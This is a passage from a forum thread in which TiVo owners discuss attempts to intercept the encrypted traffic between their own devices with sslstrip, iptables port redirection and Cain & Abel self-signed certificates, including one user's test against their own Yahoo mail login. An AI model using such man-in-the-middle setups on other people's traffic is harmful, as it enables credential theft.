Well in my example, theoretically because of my iptables rule all port 443 traffic is redirected to port 8080 which sslstrip is then processing and passing off to the actual destination. The traffic is reaching my Premiere so it looks like sslstrip is just leaving everything alone and just passing traffic through. If it were actually downgrading to http as it's supposed to and the destination TiVo didn't like that then there would be a handshaking failure and I wouldn't be able to get to show details on the host TiVo. I think part of the complication here is that the host TiVo is using port 443 (192.168.10.196 in my example) while the client TiVo is using a different port (not a specific port but varies with each attempt).

Well the problem is we don't have the TiVo certificate which is needed for this and if TiVo won't accept fake certificates then none of these MITM attacks are going to work from my limited understanding.

As an example I tried using similar techniques to see if I could sniff out my login and password for mail.yahoo.com but yahoo is smart enough to recognize it's being compromised and login wouldn't work while I had port redirection turned on.
I tried playing around with cain & abel and a self-signed cert generated by the program. TiVo wouldn't take it and then I was quickly over my head.
reneg is offline   Reply With Quote
Old 02-22-2012, 01:28 AM   #30
moyekj
Registered User
 
Join Date: Jan 2006
Location: Mission Viejo, CA
Posts: 9,260
Quote:
Originally Posted by reneg View Post
I tried playing around with cain & abel and a self-signed cert generated by the program. TiVo wouldn't take it and then I was quickly over my head.
Can you elaborate? I don't remember any option for providing self-signed certificates in Cain & Abel but maybe I missed it.
moyekj is offline   Reply With Quote
All times are GMT -5.